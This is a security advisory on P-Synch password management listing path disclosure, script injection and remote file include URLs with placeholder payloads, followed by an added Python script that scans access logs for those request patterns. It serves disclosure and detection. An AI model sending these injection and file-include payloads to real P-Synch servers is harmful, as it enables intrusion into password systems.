Vulnerabilities In P-Synch Password Management
May 30, 2022
Description:
P-Synch is a total password management solution. It is intended to
reduce the cost of ownership of password systems while improving the
security of password-protected systems. This is done through password
synchronization; enforcing an enterprise-wide password strength
policy; allowing authenticated users to reset their own forgotten
passwords and enable their locked-out accounts; and streamlining help
desk call resolution for password resets. P-Synch is available both
for internal use on the corporate intranet and for Internet
deployment in B2B and B2C applications.
Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Solution:
Upgrade to the latest version of P-Synch Password Management.
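To check web server access logs for requests matching the three URL patterns listed above while the upgrade is rolled out, the following Python script can be used. It is an added example, not part of the original advisory or of P-Synch; the combined log format, the sample log lines, the `lang=en-us` value and the pattern names are assumptions.

```python
import re
from urllib.parse import parse_qs

SCRIPTS = ("nph-psa.exe", "nph-psf.exe")          # CGI names from the advisory
ABSOLUTE_URL = re.compile(r"^(?:[a-z][a-z0-9+.-]*:|//)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the advisory patterns matched by one request target."""
    path, _, query = target.partition("?")
    if not path.lower().endswith(SCRIPTS):
        return []
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes values
    hits = set()
    # Path disclosure: the advisory's URLs pass lang with an empty value.
    if "" in params.get("lang", []):
        hits.add("path-disclosure")
    for css in params.get("css", []):
        css = css.strip()
        # Script injection: markup characters, as in the advisory's "> prefix.
        if any(c in css for c in '"<>'):
            hits.add("script-injection")
        # File include: css naming an absolute or scheme-relative URL.
        if ABSOLUTE_URL.match(css):
            hits.add("remote-css-include")
    return sorted(hits)

def scan(lines):
    """Yield (request target, matched patterns) for each flagged log line."""
    for line in lines:
        m = REQUEST.search(line)
        if m and (hits := classify(m.group(1))):
            yield m.group(1), hits

# Constructed sample access-log lines (addresses, times and values are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /psynch/nph-psf.exe?lang=en-us HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2022:10:00:05 +0000] "GET /psynch/nph-psa.exe?lang= HTTP/1.1" 200 812',
    '192.0.2.12 - - [01/Jan/2022:10:00:09 +0000] "GET /psynch/nph-psf.exe?css=%22%3E%3Cscript%3E HTTP/1.1" 200 5301',
    '192.0.2.13 - - [01/Jan/2022:10:00:12 +0000] "GET /psynch/nph-psa.exe?css=http://somesite/file HTTP/1.1" 200 5277',
]

if __name__ == "__main__":
    for target, hits in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", target)
```

A `css` value that is a plain relative stylesheet name is not flagged, so legitimate use of the parameter stays quiet.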
Credits:
James Bercegay of the GulfTech Security Research Team.